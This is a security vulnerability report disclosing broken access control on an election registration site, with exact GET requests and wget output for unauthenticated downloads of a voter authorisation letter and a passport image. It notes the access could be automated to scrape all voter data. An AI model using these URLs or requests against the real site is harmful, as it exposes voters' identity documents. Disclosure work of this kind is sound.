<div style="font-family: Arial, sans-serif; font-size: 14px;"><pre>Security Vulnerability Report
Report Title: Unauthorized Access to Voter Personal Information on registration.afrinic.net.
Report Date: [02/08/2025]
Severity:  High

 
1. Executive Summary
A security vulnerability was discovered in the afrinic election registration platform allowing unauthenticated users to access personal information of registered voters. The exposure includes passports and confidential information such as letters of authorization.

 
2. Affected System(s)
Component : <pre>registration.afrinic.net</pre>
Version
n/a<br>Environment:
wp-content/uploads/fluentform/
https://registration.afrinic.net/wp-content/uploads/fluentform/ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf
 
3. Vulnerability Details
Type: Insecure Direct Object Reference (IDOR) / Broken Access Control
Impact: Exposure of Personally Identifiable Information (PII)
Authentication Required:  No
Exploitability: Remote, unauthenticated attackers can access voter data using direct URLs.
Example Requests:
GET https://registration.afrinic.net/wp-content/uploads/fluentform/ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf
 
GET
https://registration.afrinic.net/wp-content/uploads/fluentform/ff-057be7e34e76d89f518b68a487502b38-ff-Musa_Passport_New.jpg
Response:
ff-c7be0450e17f651c 100%[===================>] 333.34K  --.-KB/s    in 0.02s  
2025-07-31 10:16:02 (13.8 MB/s) - ‘ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf’ saved [341340/341340]
 
2025-07-31 10:25:28 (16.8 MB/s) - ‘ff-057be7e34e76d89f518b68a487502b38-ff-Musa_Passport_New.jpg’ saved [144116/144116]
 
 
4. Steps to Reproduce
1. Open browser or API tool (e.g., wget/postman).
Send a GET request to the API endpoint:

GET https://registration.afrinic.net/wp-content/uploads/fluentform/ff-c7be0450e17f651c641767d8c788f22b-ff-Designation_of_Voter_Authorisation_Letter-3.pdf
 
https://registration.afrinic.net/wp-content/uploads/fluentform/ff-057be7e34e76d89f518b68a487502b38-ff-Musa_Passport_New.jpg
 
 
 
 
2. Open PDF file.
3. Observe that voter PII is returned without any authentication token or session check.
5. Impact Assessment
Exploitation Potential: High — can be automated and scaled to scrape the full voter database.

7. Disclosure Timeline
Date
Action
[02/08/2025]
Vulnerability discovered and published
 
 
 
 
 
8. References
OWASP: Insecure Direct Object References (IDOR)
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor</pre><br></div>